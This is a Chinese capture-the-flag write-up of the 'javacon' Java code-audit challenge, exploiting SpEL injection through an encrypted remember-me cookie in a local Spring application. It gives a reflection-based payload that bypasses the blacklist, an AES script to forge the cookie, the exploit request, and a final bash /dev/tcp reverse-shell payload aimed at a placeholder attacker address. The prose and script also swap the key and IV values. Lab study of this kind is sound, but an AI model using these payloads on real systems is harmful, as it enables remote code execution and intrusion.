【网络安全 | Java代码审计】Code-Breaking Puzzles-javacon

未经许可，不得转载。

源码：https://www.leavesongs.com/media/attachment/2018/11/23/challenge-0.0.1-SNAPSHOT.jar，下载至桌面。

考察知识点：SpEL注入

正文

执行命令运行环境：

java -jar C:\Users\86177\Desktop\challenge-0.0.1-SNAPSHOT.jar

浏览器访问localhost:8080

使用JD-GUI反编译，目录结构大致如下：

这是一个spring框架，先分析application.yml文件：

该文件设置了黑名单，主要过滤了任何包含 java.lang 的关键字、Runtime 类、exec 方法；并且配置了默认的用户名密码为admin、admin以及用于 remember-me 功能的密钥。

Spring框架的关键点在于Controller，即控制器，我们看看MainController.java文件实现了什么功能。

文件中，MainController.class定义了ExpressionParser：

该属性在该文件下的getAdvanceValue()函数中会被调用来解析字符串内容：

由此可知，getAdvanceValue()函数是SpEL 注入的触发点。

接着，admin()函数中调用了getAdvanceValue()函数，传递的参数为输入的username的值：

现在让我们跟进username参数，看其在哪个场景下存在SpEL注入。首先看login()函数：

/*     */   @PostMapping({"/login"})
/*     */   public String login(@RequestParam(value = "username", required = true) String username, @RequestParam(value = "password", required = true) String password, @RequestParam(value = "remember-me", required = false) String isRemember, HttpSession session, HttpServletResponse response) {
/*  70 */     if (this.userConfig.getUsername().contentEquals(username) && this.userConfig.getPassword().contentEquals(password)) {
/*  71 */       session.setAttribute("username", username);
/*     */       
/*  73 */       if (isRemember != null && !isRemember.equals("")) {
/*  74 */         Cookie c = new Cookie("remember-me", this.userConfig.encryptRememberMe());
/*  75 */         c.setMaxAge(2592000);
/*  76 */         response.addCookie(c);
/*     */       } 
/*     */       
/*  79 */       return "redirect:/";
/*     */     } 
/*  81 */     return "redirect:/login-error";
/*     */   }

这里传入了三个参数，包括username、password和remember-me，其中前两个是必须传入的，remember-me是非必须传入的。

在第一个if条件中，通过 this.userConfig.getUsername() 和 this.userConfig.getPassword() 方法从配置中获取用户名和密码，并与请求中的用户名和密码进行比较。如果用户名和密码匹配，则认为用户登录成功。接着使用session.setAttribute("username")将用户名存储在 HTTP 会话中，方便后续的请求使用：

可以看到，只有在username匹配成功的情况下，才能调用session.setAttribute("username")，因此无法将username构造为payload，即无法实现SpEL注入。

接着我们再跟进admin()函数：

先从请求头Cookie中提取remember-me参数的值，当remember-me的值为空时，调用session.getAttribute("username")来获取HTTP会话中username的值，再调用getAdvanceValue()函数来处理username，此时由于username是正确的用户名，因此无法实现SpEL注入：

/*     */     
/*  43 */     Object username = session.getAttribute("username");
/*  44 */     if (username == null || username.toString().equals("")) {
/*  45 */       return "redirect:/login";
/*     */     }
/*     */     
/*  48 */     model.addAttribute("name", getAdvanceValue(username.toString()));
/*  49 */     return "hello";

当remember-me的值不为空时（即登录时勾选了remember-me），使用 decryptRememberMe 方法解密 Cookie 值，并将解密后的值存储在 HTTP 会话中，作为 "username" 属性：

/*     */   public String admin(@CookieValue(value = "remember-me", required = false) String rememberMeValue, HttpSession session, Model model) {
/*  36 */     if (rememberMeValue != null && !rememberMeValue.equals("")) {
/*  37 */       String str = this.userConfig.decryptRememberMe(rememberMeValue);
/*  38 */       if (str != null) {
/*  39 */         session.setAttribute("username", str);
/*     */       }
/*     */     } 

可以看到，此时的username可控，可以实现SpEL注入。

因此，我们只需输入admin/admin并勾选remember-me选项，点击登录，然后在请求包中修改Cookie内容即可。

这里注意，需要将proxy及burp的端口修改为8081，防止与本地环境冲突。

由于application.yml文件中过滤了任何包含 java.lang 的关键字、Runtime 类、exec 方法，那该如何构造Payload实现绕过呢？

可以利用 Java 的反射机制来绕过黑名单限制。通过 Class.forName() 和 Method.getMethod() 等重要的方法，可以动态加载和调用方法，而这些方法的参数是字符串，因此可以通过字符串拼接的方式绕过黑名单检查。

构造后的初始Payload如下：

String.class.getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("exec",String.class).invoke(String.class.getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(String.class.getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"cmd","/C","calc"});

在SpEL中，使用T()运算符会调用类作用域的方法和常量。这里需要将Payload修改为满足SpEL的解析格式：

#{T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"cmd","/C","calc"})}

接着，将该Payload进行加密即可，源代码的加密部分如下：

其中，涉及到三个参数，initVector为c0dehack1nghere1（在ChallengeApplication.java中）、key为0123456789abcdef（在UserConfig.java中）、value为admin。

构造加密脚本：

import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.util.Base64;

public class ice{
    public static void main(String[] args)
    {
        String key="c0dehack1nghere1";
        String initVector="0123456789abcdef";
        String value="admin";
        /*    */     try {
        /* 15 */       IvParameterSpec iv = new IvParameterSpec(initVector.getBytes("UTF-8"));
        /* 16 */       SecretKeySpec skeySpec = new SecretKeySpec(key.getBytes("UTF-8"), "AES");
        /*    */
        /* 18 */       Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5PADDING");
        /* 19 */       cipher.init(1, skeySpec, iv);
        /*    */
        /* 21 */       byte[] encrypted = cipher.doFinal(value.getBytes());
        /*    */
        /* 23 */       System.out.println(Base64.getUrlEncoder().encodeToString(encrypted));
        /* 24 */     } catch (Exception ex) {
        /* 28 */       System.out.println(ex.getMessage());
        /*    */     }
    }
}

可以看到，value为admin时，加密后的结果与burp中的remember-me参数是一致的，说明加密脚本构造成功。

接着，将admin改为payload即可：

请求包如下：

GET / HTTP/1.1
Host: localhost:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Referer: http://localhost:8080/login;jsessionid=6F134EE0A90DCC7435DDC29F6A6FE9D1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=6F134EE0A90DCC7435DDC29F6A6FE9D1; remember-me=bvik1nAmjEAllRdn5UKWGC9uCj0hW0P2B6k1uigkS1acKxD9b_xNi-x09UGgjU1DvDEI2GGk4Jn0ApM_cSVc0G7kGnvvtewNRVsfqFUCR0fMAPqbj6yqACW6XVtt8Fp1nBwebKd7pkYSZCv6Yj3X7H-0-8HDV6F3sS3yWHUQEBPAyiNmKfkSKUV5VVlNdo16Nij8YX8HvKdeMHJ7_5Sdjfmfq3dKPeUOivMyVp_GdEkffgly4YX4eWCOzQRr4uQgodsKw2pC9N9udnw3Fz7O5ZhzmoYttjLubBowMtkF-Q6HHCvBrK9SWCzRQXC6jqYX_XeqyZuDreUixnpXpzlN9H7gNu6g_wGm_cm_ZTToae358b5MVNWC71uaMEt3PRJl
Connection: close

弹出本地计算器，SpEL注入成功：

构造反弹shell：

#{T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/攻击机IP/端口 0>&1"})}